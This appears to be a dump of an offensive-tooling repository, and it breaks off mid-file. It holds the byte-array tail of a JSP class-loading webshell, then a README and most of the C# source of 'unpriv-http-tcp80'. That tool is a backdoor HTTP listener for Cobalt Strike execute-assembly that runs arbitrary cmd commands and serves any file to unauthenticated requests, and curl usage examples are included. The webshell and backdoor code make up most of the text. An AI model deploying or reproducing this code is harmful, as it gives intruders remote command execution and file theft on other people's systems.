,-57,82,-19,90,108,32,53,-120,0,-124,70,-48
,-74,-40,-16,72,-118,104,107,-95,33,-30,51,-69,47,15,-86,-32,-25,-16,42,5,-81,-122,23,17,-26,76,103,103,-59,72,36,-38,-57,-36,126,30,-81,33,89,-15,90,5,-81,-61,-21,21,56,0,19,10,-34,-128,95,80,-32,41,120,58,75,87,-33,-105,-69,-84,10,-34,-120,55,41,120,51,-20,83,-16,-117,-84,36,-95,-69,-21,-36,86,5,-65,-124,95,86,-32,9,120,-110,60,38,-95,37,-75,-108,33,113,-10,-22,40,58,37,-10,-113,115,-69,-38,-7,68,34,-15,21,-4,42,66,117,110,97,117,42,53,76,-117,36,110,-116,52,-94,-97,116,11,-93,125,13,71,17,-114,42,116,48,-58,77,78,67,-34,1,-113,40,120,43,126,-99,-62,31,-7,-97,-124,-73,41,120,59,-18,52,79,-104,-38,-86,-5,74,71,40,22,-46,-83,117,7,-34,-87,-32,46,-68,75,-63,-35,-8,13,67,-77,-85,-11,88,-42,25,26,98,-17,119,-21,-20,-23,-111,-72,53,54,50,-92,37,66,124,-104,-124,-33,84,48,-115,-33,82,-16,110,-4,-74,-124,-9,40,-72,7,-65,35,-31,-67,10,-34,-121,-9,43,-8,0,-18,53,-92,55,72,41,-16,24,28,84,-16,65,124,72,-63,-121,49,-93,-64,33,120,70,-127,113,120,84,-63,125,56,38,-31,126,86,41,-15,62,-114,-113,74,120,64,-63,9,124,76,-62,-125,-60,-116,105,-7,70,-61,-12,10,62,-50,-38,45,-21,-90,123,-100,-20,-41,18,-115,-83,28,-46,-56,-104,10,62,1,-124,110,79,-26,14,-60,39,-55,-12,-16,38,62,-91,-32,-45,-8,-108,-79,20,76,81,118,33,-119,-22,-78,-66,-62,-9,123,121,34,17,-38,-74,118,36,-107,-13,26,9,15,41,-8,12,126,-105,89,-70,-106,54,-122,-6,-6,-78,52,-65,-57,-18,116,29,62,-85,-32,-9,-15,122,-124,18,-35,-54,43,70,-6,-5,-39,81,-91,-106,-75,-99,-99,-83,45,-35,10,62,71,126,-128,-49,-29,11,10,-66,-120,47,-27,-37,-73,-115,-102,96,60,-68,-119,110,104,95,31,109,78,-78,27,-68,44,-31,15,20,-4,33,-66,-94,-32,-113,-16,-57,10,-20,-123,7,21,-4,9,-66,74,41,115,-19,26,-14,-83,85,-53,-37,-38,41,32,-83,108,11,-26,14,-8,41,-66,-122,48,-41,32,75,98,-124,7,67,-28,3,-47,100,-109,65,-69,-59,-104,42,-8,58,-93,9,93,-83,-53,87,74,-8,51,5,127,-114,-65,-96,-53,-128,111,40,-8,75,-42,-7,-81,20,-4,53,-2,70,-63,-33,-30,24,49,-65,106,109,87,-49,-14,-82,-107,124,-14,-17,20,-4,61,47,-4,-127,13,121,35,-66,65,89,111,-26,-27,97,-103,-7
,-18,-68,73,108,46,93,-54,-93,-73,16,112,41,11,-12,54,-17,122,-101,102,-115,10,-2,17,-1,-92,-32,-97,-15,47,10,-66,67,-105,-117,70,-92,-69,119,121,-12,87,124,79,-63,-65,-15,9,-17,-77,-85,-88,57,29,117,106,-87,45,-15,-60,38,14,38,-119,-2,80,88,83,-16,-17,-8,30,66,69,-127,18,77,-11,101,-99,51,11,62,57,-85,86,-4,-128,-81,-14,126,120,4,-95,118,-122,-79,11,34,-60,-43,122,-124,-64,15,21,120,1,94,84,-32,57,120,94,-127,-105,-32,101,-86,79,-90,37,25,5,-1,-127,-1,84,-16,95,-8,111,5,-1,-125,-1,-51,70,42,29,-95,61,-50,-31,45,111,71,112,48,-98,-96,-120,-10,44,124,95,-127,127,-29,71,18,78,42,22,32,97,45,-120,-93,-118,-59,98,-79,102,3,-96,126,-83,-70,40,43,-59,-121,20,-117,96,17,21,-117,-115,-99,110,-2,-1,30,-85,-77,-95,87,-89,-80,58,-108,28,-92,50,-119,-36,-92,83,-117,39,-76,51,-87,33,-122,-22,-89,69,-116,120,50,21,-93,59,-67,-114,-77,88,-124,93,118,26,2,-97,-112,31,27,40,111,20,-31,35,-113,-121,92,68,-92,-68,65,9,115,93,40,58,-94,-23,-91,87,27,-33,-101,-51,-95,72,52,-76,33,74,16,-127,116,77,17,-48,22,26,30,-42,98,52,104,60,-94,2,-55,-116,-48,-51,102,86,-90,114,78,78,-59,-77,-71,-92,-62,83,-76,-94,-110,54,51,15,107,-5,-71,82,107,-53,-57,-56,22,53,68,108,11,103,-106,-61,84,89,116,-120,-40,31,29,73,82,-106,17,-61,-47,120,-110,-16,-20,-31,-8,-48,112,40,-95,117,-57,15,-77,-121,-124,-99,21,39,-63,-90,34,49,-35,-7,44,123,102,-68,-97,90,35,14,-100,20,53,-70,-88,36,-43,-110,-71,-28,80,66,-96,-107,113,35,12,-111,-66,60,-25,51,39,-114,72,-78,45,-106,76,-123,98,97,98,-93,-100,99,-37,12,11,30,-19,-103,86,119,76,71,-47,69,-86,42,-60,-95,-36,-96,-57,-43,-83,116,84,-119,-98,72,-77,-121,-100,112,88,-61,20,-37,77,-94,8,92,43,32,-12,-104,-107,-52,20,-42,26,109,-101,-23,69,-51,-45,-105,-14,93,-84,121,90,85,18,-28,-127,102,92,8,-99,117,78,-1,70,88,91,21,10,-89,-30,9,-86,-66,-26,123,-118,-80,84,-128,-45,108,-88,107,58,-72,-120,-70,102,-20,-28,51,-13,50,94,75,60,26,53,-20,70,-63,70,-120,70,-110,-87,41,37,77,79,-119,89,23,-42,-31,122,-92,105,39,124,118,-54,-124,70,21,26,-5,82,121,-2,86,125,-107,-49,-101
,85,8,-29,-53,-108,98,-102,-15,4,-69,113,62,-43,54,19,78,68,93,51,-95,116,-46,96,40,-39,-87,-37,-107,46,33,-107,-99,66,76,-97,20,94,-106,92,57,-20,-102,-14,-61,-77,19,-28,-63,-119,-44,54,46,21,15,83,-37,-50,-72,40,-77,-55,52,-7,-119,-109,-4,44,123,14,-123,-37,-4,21,-82,43,9,-39,44,-89,5,-113,94,77,87,20,-61,36,17,-24,-82,83,101,110,-46,55,50,-17,-86,-120,22,-19,-93,-99,101,5,-54,48,94,-115,-91,5,0,10,50,-12,4,11,114,-19,85,-120,76,-96,66,100,29,-57,105,60,12,-37,6,98,20,53,91,66,108,-94,89,-123,-89,26,108,116,105,-55,97,114,1,-51,120,78,-50,-55,19,51,47,-103,52,27,-101,91,19,-119,120,34,43,77,126,21,-68,-115,10,-12,33,14,-116,-20,26,-31,-8,-16,54,126,-118,-51,-76,75,91,17,-112,-82,15,91,-44,-84,127,-35,-123,-95,45,23,-4,4,26,-48,1,50,69,-85,-92,-90,63,103,4,-114,75,-20,-10,-39,104,116,-40,106,-127,-33,-50,73,29,-64,94,-102,23,-68,12,-84,-26,-30,79,95,-61,78,-45,112,-55,-122,97,35,-36,81,-10,-11,76,-89,100,-90,104,99,107,25,33,-10,71,6,-24,-54,-81,-96,-73,-17,38,61,-78,123,40,-8,21,-29,86,-29,-117,-56,-7,100,-118,99,-85,30,45,79,-3,-8,87,-29,-57,61,8,-83,3,-52,-18,113,69,8,20,69,-73,37,-76,-95,-8,102,45,-5,42,-120,-103,85,69,-74,2,-108,67,81,126,-63,115,114,-87,-54,-103,-88,16,-87,-103,-105,-118,46,112,26,17,117,-41,-56,105,-108,17,76,-46,-108,-116,-76,80,34,-33,52,-71,69,34,89,-110,-118,-25,-86,27,-86,-91,-90,62,98,-52,56,92,-24,-113,70,-24,-110,40,20,39,-70,-76,-95,16,69,111,86,121,-115,-89,-91,88,-6,53,-9,-8,-114,48,91,103,-113,-16,-24,-90,21,-109,-61,81,78,13,-59,-30,73,-63,71,-118,-100,-5,-38,-109,35,27,-110,102,122,-81,-28,-41,121,49,36,18,-11,92,-86,34,18,-58,101,-107,6,-116,-92,72,-47,-124,70,-45,75,-57,36,-21,34,63,8,-28,7,107,-46,50,41,-95,-125,-18,125,107,84,27,-94,55,6,97,-105,112,-72,52,-89,70,-22,-55,43,54,-103,-36,44,-13,-68,92,-3,105,70,-85,54,35,-64,-23,-123,98,-98,-111,-90,-86,71,-50,-6,-111,-28,-14,100,-110,63,113,-111,15,-81,74,-60,-121,56,46,-49,-64,-45,-93,118,119,-17,-39,-83,116,57,-118,16,57,-93,-120,54,103,126,15,-55,63,62,-95,-11,-13,-59,105
,50,42,-115,102,-77,24,40,-74,-58,31,123,-110,-4,-23,-128,-72,-44,-53,-74,-46,-92,-15,41,33,59,-73,25,-97,107,16,78,43,114,97,-114,-12,27,-116,-60,58,54,-126,-109,71,87,-100,-99,1,122,106,-128,121,112,15,-108,-128,5,-10,-64,119,-64,74,-3,-67,112,31,0,-11,-9,-61,3,-44,-37,-7,105,68,111,-1,-121,116,-40,-61,-32,-94,113,6,-10,81,59,70,-112,50,-22,-111,122,-47,75,16,70,-25,-49,4,-12,2,48,-106,109,-125,96,-125,-7,-44,11,13,7,-63,66,127,29,62,-21,-62,78,-97,-80,48,32,120,125,-30,-62,-125,96,-91,-65,-121,-127,38,54,-102,-120,-12,-9,48,-40,124,18,-115,-91,12,-56,126,-47,39,103,-121,54,-97,-45,-106,29,75,62,39,-93,-40,3,-78,-49,-103,67,-80,11,126,-121,-24,47,-79,-7,21,-55,95,42,-5,103,57,109,-2,-39,78,-55,-17,116,-54,-2,50,-89,-35,-17,82,5,-105,-61,122,0,74,-58,64,57,8,-91,-127,114,-89,-121,38,-127,10,-93,115,55,-70,102,-27,22,37,-125,-94,101,39,-60,92,-77,3,-107,-115,46,103,110,-87,44,48,71,-99,-109,1,-105,-65,-54,93,101,-71,3,108,105,56,-59,93,-11,-88,28,80,-43,57,-86,-102,-127,114,3,118,-12,56,84,-12,-18,3,-73,90,-103,-127,-54,113,-80,-9,-86,-22,62,-96,109,52,-83,10,84,-90,39,31,-13,-14,-118,26,-88,82,-85,-36,-10,49,-88,30,-125,-102,64,5,109,11,84,-86,-27,-116,-18,85,101,90,-42,-73,-44,-87,-27,25,-88,-25,102,-82,117,-113,90,-31,46,-45,-27,-82,84,43,15,89,-30,52,117,-23,83,-30,-55,117,84,6,-26,-115,-126,-94,83,-98,-65,-61,-46,-59,-72,24,100,20,106,5,-41,-47,-90,8,61,-115,-82,99,114,-46,-40,3,85,-29,112,108,-81,90,-71,15,-114,35,17,72,-128,-29,15,-126,39,80,-83,86,-85,85,25,88,-96,86,11,25,-16,-70,26,-44,-22,12,-8,70,-95,73,-83,62,8,13,-34,12,52,-70,78,24,-125,-90,64,-115,90,-125,-62,1,56,-79,-41,-22,13,98,6,78,-46,-105,-43,-102,12,44,-52,-64,-94,70,-41,-55,-71,99,22,51,-22,24,-8,3,-75,106,-19,24,-100,-94,-42,-18,-121,83,17,2,117,106,-35,126,56,13,97,20,22,-14,40,-128,-64,28,-43,55,-70,-102,-119,106,73,-81,85,-83,15,-102,92,-50,37,-122,-22,-57,96,-119,58,55,3,75,-45,-109,-49,22,55,-42,82,-26,115,89,-96,46,13,82,-96,-34,-70,-57,75,-78,27,-54,61,61,3,103,4,-22,-43,-6,12,44,39,
82,117,-22,92,-85,58,119,34,3,43,-44,-70,12,-76,112,-77,-110,119,-74,-18,-121,85,-20,-71,103,22,-80,118,86,62,107,106,-3,33,-16,-85,-11,-82,-43,25,104,-37,1,62,26,-99,-91,-113,-26,51,127,25,88,67,-44,5,87,-69,-104,-27,-66,87,80,-25,-78,8,61,-23,-55,-67,124,66,71,25,-34,-76,11,74,121,-40,-55,108,30,-53,-93,-75,124,-40,51,-96,-46,-50,-77,13,-71,-35,34,113,-83,-17,-77,-18,41,19,-128,-68,107,-18,56,-100,67,-2,-44,21,56,-118,-71,39,55,-21,-11,-41,-109,-64,-11,-18,122,90,-100,-57,-14,-52,-77,-70,73,65,65,-11,40,117,94,6,-70,-45,-109,-81,-87,-28,15,-25,-46,-102,-32,90,103,-16,-29,90,-51,-4,-48,106,-49,24,-100,-89,83,-97,58,81,103,46,123,-88,90,-50,88,-67,-45,93,79,112,-99,-97,117,-95,98,-84,-110,-78,75,-78,-66,120,8,63,-92,-87,-94,79,-85,-56,53,47,32,-41,-36,1,17,-126,-51,-42,97,42,-115,-100,60,26,-125,79,-8,-55,62,23,-78,127,100,-32,-94,113,-72,-104,110,-118,-69,122,31,-84,47,43,25,-53,64,72,-83,-79,102,96,67,-49,94,8,-85,85,106,-51,126,-24,-77,66,-113,-22,118,-105,-70,-76,96,26,-109,68,-121,-57,-3,65,-22,102,-79,-13,14,16,-12,66,58,111,80,63,-81,81,-33,-74,31,34,22,50,-34,70,-61,-67,47,-54,-64,-90,52,-120,-127,106,115,45,106,-127,-98,52,46,-96,61,67,-6,-98,123,102,-20,57,4,91,-36,-74,49,-120,-47,-91,80,89,77,113,127,-115,91,-14,-41,90,-3,117,89,-101,-44,-69,107,110,-121,46,119,13,-37,-119,49,-122,-55,-69,-84,-18,26,-74,70,61,27,-85,-101,-127,-105,-12,-72,-21,-36,53,-21,-3,-44,-72,109,119,-126,-125,102,-75,119,-126,-109,56,119,-80,-25,36,-126,105,-104,-99,59,32,61,121,95,86,74,-88,-92,-125,-13,-92,-84,-42,-91,-124,45,-60,113,82,-25,120,104,58,-57,21,110,-121,25,73,-7,30,79,48,-21,-92,93,-34,-104,-22,97,45,-113,-24,-19,-26,81,32,-107,-15,104,11,121,-25,-69,-71,-29,-22,-117,28,-105,85,-100,90,-18,37,-32,-44,-107,42,-16,-112,52,-52,-3,-72,-40,-107,6,-95,-61,-70,-121,-110,-52,78,-100,-121,-57,64,-83,37,108,-39,104,25,-126,90,-63,34,-84,21,-70,-88,-65,66,-72,70,-72,-98,-6,-121,-59,-59,-30,-87,80,43,14,-120,-69,-59,52,-44,82,50,105,-79,81,57,-117,43,45,-61,-36,91,46,-79,46,-26,
-34,-22,-73,78,-24,-3,99,-30,71,-36,-21,89,103,28,30,53,-78,14,86,-126,8,50,-11,-114,113,-40,74,70,-38,-42,-47,48,-79,-52,-22,23,-36,66,-35,46,120,-65,-63,45,92,41,-32,-94,50,-104,-36,-18,23,9,116,7,52,-8,-68,15,-127,-32,22,-59,-53,78,-50,-64,-91,61,-26,-52,-74,93,-38,106,-52,93,-97,-52,-64,101,61,105,-40,-97,-65,-43,-90,111,109,61,-20,86,-73,-83,12,-34,-35,46,93,118,121,-34,-126,-51,57,123,-69,-104,37,-6,41,-125,104,95,62,81,-23,-1,65,-50,45,-107,-63,-63,-19,78,91,-63,-110,-28,60,125,-69,62,77,79,42,-66,12,108,-65,-33,-52,-52,7,96,-62,-44,-111,11,4,112,80,111,107,-96,-72,-40,-31,-101,88,-58,14,93,-73,15,62,29,16,-84,-92,23,-111,84,-11,38,-111,-78,-7,-36,-30,-107,34,46,90,68,2,51,-52,-18,-74,89,118,78,-66,69,-83,-98,-22,-98,46,64,-111,76,20,73,71,-111,12,-108,93,42,113,-54,108,58,79,100,-2,51,112,-71,-119,-17,-105,-35,-78,115,-23,29,96,87,41,-49,36,-18,103,74,110,-103,-95,6,17,-118,-23,-109,-81,82,-85,19,-71,80,101,-103,102,-77,34,100,-25,-110,-19,98,1,29,-69,-37,62,-99,-114,-99,-95,6,29,-69,78,-57,110,-48,113,19,29,-39,70,-38,-38,-22,-74,51,-119,-12,100,-107,-79,75,-41,-113,-52,-33,-53,-87,-56,-31,-62,38,73,-6,-79,81,63,-32,-102,-35,-18,117,93,-111,-127,-49,-80,-110,-78,94,-76,-38,-25,-90,34,70,52,19,61,-87,-80,82,21,-83,68,-24,-77,25,-72,82,-97,-48,-8,42,35,-29,-73,-25,33,49,29,29,70,22,79,79,-114,53,88,9,-40,35,-12,-47,62,-125,-127,-57,-23,39,-128,-31,-48,79,-64,-109,38,43,-101,-88,42,-109,-88,-65,-104,-77,117,3,37,-21,12,124,-114,-30,-11,-43,-99,-115,-5,-31,-13,-100,-91,-50,-92,-63,53,-100,-92,-82,13,8,44,-50,117,1,81,21,-51,53,15,-113,-12,-59,-21,3,54,-43,-10,56,-36,48,10,101,-86,45,3,95,32,-65,-72,113,20,68,97,79,122,-14,-107,-12,100,-122,-18,103,33,11,118,-2,87,-116,89,-26,-35,64,55,-118,-68,5,-82,-48,-21,-91,14,-21,50,-17,-124,95,-112,40,-26,-39,-58,-31,-90,94,-86,-3,110,14,72,117,110,97,23,5,109,74,-57,95,-12,-117,-86,-92,-38,-84,-86,-115,-14,-20,-105,122,84,-118,-96,95,38,73,-27,62,54,57,109,-78,-45,-86,-35,-86,-38,-11,-43,58,-126,-83,95,-65,-52,45,10,-69,
-95,-38,45,58,-19,119,65,57,89,86,-81,-101,-20,20,72,40,44,-39,105,-82,-38,-125,-23,-55,-99,62,67,79,118,-2,79,-122,-55,-38,117,-60,46,107,103,-117,-41,42,59,43,-58,-32,43,65,-81,-13,120,115,100,6,105,-30,-73,-50,59,-79,11,-70,-68,117,11,15,-63,42,106,89,79,-113,-125,125,-108,98,-80,64,-103,-120,75,3,-118,55,-91,60,-47,99,-89,-24,-85,99,7,83,-59,9,-26,123,-3,24,124,-107,34,57,77,57,-69,-46,-78,-19,74,43,-39,-17,94,-97,-18,57,8,93,48,0,27,117,-93,-39,-7,-33,105,-90,-39,-94,-90,7,-83,-9,77,28,-128,91,58,117,-41,-15,17,23,107,-40,119,50,-16,-75,-128,-24,-110,-104,-30,-24,40,-108,-20,-123,29,-52,-64,49,-82,91,-89,32,95,103,-120,-53,117,-101,9,-111,-9,-62,-19,1,-79,-47,45,-88,98,80,119,-97,-121,-68,13,-115,-66,49,-40,57,-35,117,-20,-4,1,-36,-28,-31,36,114,29,-26,-31,88,47,31,72,66,55,16,-49,119,-80,123,100,-32,-50,29,116,101,-40,81,119,-87,-94,-73,49,3,119,-51,36,-12,28,60,111,106,-7,4,34,36,82,63,127,28,118,-109,74,-65,-47,-31,-85,-87,-18,19,-42,103,-32,-101,-43,-21,-105,-43,-111,77,5,31,123,94,90,21,-78,22,122,1,94,52,-9,-98,-94,-65,42,-128,-118,71,-101,30,-26,-68,-94,-34,57,-27,-83,-105,123,5,99,-24,-92,-95,-43,24,86,109,-67,124,73,-51,30,-109,-56,75,-16,-78,73,-28,116,98,-118,-119,44,34,-81,107,111,-80,85,51,-18,-51,-35,13,98,-75,83,-66,-44,28,11,-43,78,103,118,108,-83,118,86,101,-57,-39,-32,-9,3,-8,-95,73,108,22,-11,86,-22,45,-62,30,115,-19,21,-8,-111,-87,-78,82,-6,-15,-102,-7,-102,-55,-86,-29,-57,-12,-5,-55,-111,32,-67,10,63,-99,-2,54,-94,-54,-23,91,-39,8,-13,90,-18,-23,52,71,-105,7,-96,100,28,-18,38,-107,126,-5,65,8,27,-44,-32,127,0,-21,-71,71,-95,-65,36,0,0}); 94 | Class clazz = loader(clazzBytes); 95 | namespace.put(charslist, clazz.newInstance()); 96 | } 97 | namespace.get(charslist).equals(args); 98 | 99 | 100 | } 101 | 102 | %> 103 | <%-- ------------------------------------------------------------------------------- --%> 104 | 105 | -------------------------------------------------------------------------------- /unpriv-http-tcp80/README.md: 
-------------------------------------------------------------------------------- 1 | !!! Disclaimer !!! 2 | 3 | - The authors do not have any responsibility and/or liability for how you will use this information and the source code! 4 | - Everything that anyone can find in this repository is only for educational and research purposes, and the authors have no responsibility for how you will use the data found. 5 | 6 | A simple HTTP server with a few features that binds to port 80 from an unprivileged user account. This works because of the URL reservation shown below, which lets every user listen under that prefix. None of the calls listed under Features asks for credentials, so anyone who can reach the port and knows the URI path can use them with the rights of the account that started the server. 7 | 8 | netsh http show urlacl 9 | 10 | Reserved URL : http://+:80/Temporary_Listen_Addresses/ 11 | User: \Everyone 12 | Listen: Yes 13 | Delegate: No 14 | 15 | Features: 16 | 17 | - binds to /Temporary_Listen_Addresses/random-string 18 | - suitable to use with execute-assembly (CS) 19 | - status and shutdown: GET /status and GET /shutdown 20 | - simple code exec: GET /command?"COMMAND" 21 | - code exec with parameters: POST /apic, parameter: lang 22 | - file download: GET /file?FILENAME 23 | - URI path is randomized to avoid issues when unintentionally forgetting to call shutdown 24 | - status page contains usage examples 25 | 26 | 27 | Compilation example: 28 | 29 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:C:\unpriv-http-tcp80-v0.3.exe C:\unpriv-http-tcp80-v0.3.cs 30 | 31 | Usage example: 32 | 33 | - C:\unpriv-http-tcp80-v0.3.exe 34 | 35 | Changelog: 36 | 37 | - Version 0.1 38 | - bind to /Temporary_Listen_Addresses/random-string 39 | - suitable to use with execute-assembly (CS) 40 | - status and shutdown 41 | - simple cmd exec 42 | - file download 43 | - Version 0.2 44 | - POST cmd exec /apic and parameter lang="dir C:\" 45 | - Version 0.3 46 | - available commands usage on the status page 47 | - updated file download 48 | 49 | CREDITS: 50 | 51 | - File download inspired by: https://gist.githubusercontent.com/zezba9000/04054e3128e6af413e5bc8002489b2fe/raw/6bd6c8f992e895b9840f945819ca647f8f889616/HTTPServer.cs 52 | 53 | 
--------------------------------------------------------------------------------
/unpriv-http-tcp80/unpriv-http-tcp80-v0.3.cs:
--------------------------------------------------------------------------------
// darksh3llRU unpriv-http-tcp80.exe

// netsh http show urlacl

// Reserved URL : http://+:80/Temporary_Listen_Addresses/
// User: \Everyone
// Listen: Yes
// Delegate: No
// SDDL: D:(A;;GX;;;WD)

// Features:
// - bind to /Temporary_Listen_Addresses/random-string
// - suitable to use with execute-assembly
// - status and shutdown: GET /status and GET /shutdown
// - simple code exec: GET /command?"COMMAND"
// - code exec with parameters: POST /apic, parameter: lang
// - file download: GET /file?FILENAME
// - URI path is randomized to avoid issues when unintentionally forgetting to call shutdown
// - status pages contains usage examples

// How to compile:
// C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:S:\unpriv-http-tcp80-v0.3.exe S:\unpriv-http-tcp80-v0.3.cs

// CREDITS:
// File download inspired by: https://gist.githubusercontent.com/zezba9000/04054e3128e6af413e5bc8002489b2fe/raw/6bd6c8f992e895b9840f945819ca647f8f889616/HTTPServer.cs

// Version LOG:
// Version 0.1, 04-11-2022
// - bind to /Temporary_Listen_Addresses/random-string
// - suitable to use with execute-assembly (CS)
// - status and shutdown
// - simple cmd exec
// - file download
// Version 0.2, 23-05-2023
// - POST cmd exec /apic and parameter lang="dir C:\"
// Version 0.3, 03-10-2023
// - available commands usage on the status page
// - updated file download

using System;
using System.Collections.Generic;
using System.Net;
using System.IO;
using System.Threading;
using System.Text;
using System.Diagnostics;

namespace unprivHTTP
{
	// HttpListener-based server that runs its accept loop on a dedicated thread and
	// dispatches each request in ProcessContext by HTTP method and URL path suffix.
	//
	// NOTE(review): no handler in this class checks credentials, a token or the
	// caller's address; the URI path passed to the constructor is the only thing a
	// client has to know. Every handler also writes to the console, and the command
	// handlers start a "cmd /c ..." child of the hosting process.
	class HTTPServer
	{
		// Format template for the status page. Placeholders: {0} host name from the
		// request, {1} module name of the current process, {2} command output,
		// {3} URI path.
		// NOTE(review): this looks like an HTML template whose tags were lost when
		// the listing was extracted; as printed, the pieces are empty strings or
		// contain raw line breaks - confirm against the original file.
		public static string pageData =
			"" +
			"" +
			"" +
			"CS UnprivTCP80 HTTP listener" +
			"" +
			"" +
			"
Status and info page:
" +
			"
" +
			"" +
			"
" +
			"
Current host: {0}
" +
			"
Current process: {1}
" +
			"
Available calls:
" +
			"
1) Status page with the how-to and shutdown button: GET http://{0}{3}/status 
" +
			"
2) Shutdown call: GET http://{0}{3}shutdown 
" +
			"
3.1) Command exec via browser: GET http://{0}{3}command?\"dir C:\\\" 
" +
			"
3.2) Command exec via curl: curl -v 'http://{0}{3}command?dir%20C:\\' 
" +
			"
3.3) Command exec via curl: curl -v 'http://{0}{3}apic' -X POST -d 'lang=dir C:\\' -d 'lang=whoami' 
" +
			"
4.1) File download via browser: GET http://{0}{3}file?C:\\Users\\Public\\LightMale_Red.png 
" +
			"
4.2) File download via curl: curl -v 'http://{0}{3}file?C:\\Users\\Public\\LightMale_Red.png' 
" +
			"
" +
			"
Command output:
" +
			"
 {2} 
" +
			"" +
			"";

		// Listener thread and the flag its loop polls; Stop() clears the flag.
		private Thread thread;
		private volatile bool threadActive;

		// Listener plus the three parts of the prefix it registers in Listen().
		private HttpListener listener;
		private string ip;
		private int port;
		private string uripath;

		// Stores the prefix parts; nothing is opened until Start() is called.
		public HTTPServer(string ip, int port, string uripath)
		{
			this.ip = ip;
			this.port = port;
			this.uripath = uripath;
		}

		// Starts Listen() on a new thread. Throws if a thread is already recorded.
		public void Start()
		{
			if (thread != null) throw new Exception("WebSrv is active, try calling stop first");
			thread = new Thread(Listen);
			thread.Start();
		}

		// Clears the loop flag, stops the listener, joins the listener thread, closes
		// the listener and then ends the whole process with exit code 0.
		public void Stop()
		{
			threadActive = false;
			if (listener != null && listener.IsListening) listener.Stop();

			if (thread != null)
			{
				thread.Join();
				thread = null;
			}

			if (listener != null)
			{
				listener.Close();
				listener = null;
			}
			// Terminates the process, so the return below is never reached.
			System.Environment.Exit(0);
			return;
		}

		// Thread body: registers the prefix "http://{ip}:{port}{uripath}" and handles
		// requests one at a time until threadActive is cleared or an exception ends
		// the loop.
		private void Listen()
		{
			threadActive = true;

			try
			{
				listener = new HttpListener();
				listener.Prefixes.Add(string.Format("http://{0}:{1}" + uripath, ip, port));
				listener.Start();
			}
			catch (Exception e)
			{
				// Registration or start failed: report it and leave the thread.
				Console.WriteLine("ERROR: " + e.Message);
				threadActive = false;
				return;
			}

			while (threadActive)
			{
				try
				{
					// Blocks until a request arrives.
					var context = listener.GetContext();
					if (!threadActive) break;
					ProcessContext(context);
				}
				catch (HttpListenerException e)
				{
					// 995 is Win32 ERROR_OPERATION_ABORTED; presumably what GetContext
					// raises when Stop() shuts the listener down, hence not printed.
					if (e.ErrorCode != 995) Console.WriteLine("ERROR: " + e.Message);
					threadActive = false;
				}
				catch (Exception e)
				{
					Console.WriteLine("ERROR: " + e.Message);
					threadActive = false;
				}
			}
		}

		// Handles one request. The checks below are independent "if" blocks matched on
		// HTTP method and on the END of the URL path (EndsWith), not on the full path.
		//
		// NOTE(review): request data is used as-is: the command handlers append the
		// decoded client string to "cmd /c ", and the file handler opens whatever path
		// the query string names. There is no allow-list, quoting or path restriction
		// in this method.
		private void ProcessContext(HttpListenerContext context)
		{
			HttpListenerRequest req = context.Request;
			HttpListenerResponse resp = context.Response;

			// Host name as sent by the client, and the module name of this process;
			// both are echoed into the status page.
			var curHost =
				req.UserHostName.ToString();
			string curProcess = Process.GetCurrentProcess().MainModule.ModuleName;

			// [HttpGet('/status')]
			if ((req.HttpMethod == "GET") && (req.Url.AbsolutePath.EndsWith("/status") == true))
			{
				byte[] data = Encoding.UTF8.GetBytes(String.Format(pageData, curHost, curProcess, "", uripath));
				resp.ContentType = "text/html";
				resp.ContentEncoding = Encoding.UTF8;
				resp.ContentLength64 = data.LongLength;
				// The returned task is not awaited here.
				resp.OutputStream.WriteAsync(data, 0, data.Length);
			}

			// [HttpGet('/shutdown')]
			if ((req.HttpMethod == "GET") && (req.Url.AbsolutePath.EndsWith("/shutdown") == true))
			{
				Console.WriteLine("Shutting down the instance...");
				this.Stop();
			}

			// [HttpGet('/command?"{cmd}"')]
			if ((req.HttpMethod == "GET") && (req.Url.AbsolutePath.EndsWith("/command") == true) && (req.QueryString != null) && (req.QueryString.Count > 0))
			{
				// First query-string value, URL-decoded, is the command line.
				string command = Uri.UnescapeDataString(req.QueryString[0]);
				Console.WriteLine("Executed command and results: " + command.ToString());
				try
				{
					System.Diagnostics.ProcessStartInfo procStartInfo =
						new System.Diagnostics.ProcessStartInfo("cmd", "/c " + command);

					// Capture stdout without a shell-execute wrapper or a visible window.
					procStartInfo.RedirectStandardOutput = true;
					procStartInfo.UseShellExecute = false;
					procStartInfo.CreateNoWindow = true;
					System.Diagnostics.Process proc = new System.Diagnostics.Process();
					proc.StartInfo = procStartInfo;
					proc.Start();
					string result = proc.StandardOutput.ReadToEnd();
					// NOTE(review): as printed the search string is empty; presumably the
					// original escaped a "<DIR>" marker for HTML and the listing lost the
					// markup - confirm against the original file.
					result = result.Replace("", "<DIR>");
					Console.WriteLine(result);

					byte[] data = Encoding.UTF8.GetBytes(String.Format(pageData, curHost, curProcess, result, uripath));
					resp.ContentType = "text/html";
					resp.ContentEncoding = Encoding.UTF8;
					resp.ContentLength64 = data.LongLength;

					resp.OutputStream.WriteAsync(data, 0, data.Length);
				}
				catch
					(Exception e)
				{
					Console.WriteLine("ERROR: " + e.Message);
				}
			}

			// [HttpPost('/apic', 'lang')]
			if ((req.HttpMethod == "POST") && (req.Url.AbsolutePath.EndsWith("/apic") == true))
			{
				System.IO.Stream body = req.InputStream;
				System.Text.Encoding encoding = req.ContentEncoding;
				System.IO.StreamReader reader = new System.IO.StreamReader(body, encoding);
				if (req.ContentType != null)
				{
					Console.WriteLine("Client data content type {0}", req.ContentType);
				}
				Console.WriteLine("Client data content length {0}", req.ContentLength64);

				// The whole request body is read, every "lang=" occurrence is removed and
				// the rest is URL-decoded; the body is not parsed as form fields.
				string command = Uri.UnescapeDataString((reader.ReadToEnd()).Replace("lang=", ""));
				Console.WriteLine("Executed command and results: " + command.ToString());
				try
				{
					System.Diagnostics.ProcessStartInfo procStartInfo =
						new System.Diagnostics.ProcessStartInfo("cmd", "/c " + command);

					procStartInfo.RedirectStandardOutput = true;
					procStartInfo.UseShellExecute = false;
					procStartInfo.CreateNoWindow = true;
					System.Diagnostics.Process proc = new System.Diagnostics.Process();
					proc.StartInfo = procStartInfo;
					proc.Start();
					string result = proc.StandardOutput.ReadToEnd();
					// NOTE(review): same empty search string as in the GET handler above.
					result = result.Replace("", "<DIR>");
					Console.WriteLine(result);

					byte[] data = Encoding.UTF8.GetBytes(String.Format(pageData, curHost, curProcess, result, uripath));
					resp.ContentType = "text/html";
					resp.ContentEncoding = Encoding.UTF8;
					resp.ContentLength64 = data.LongLength;

					resp.OutputStream.WriteAsync(data, 0, data.Length);
				}
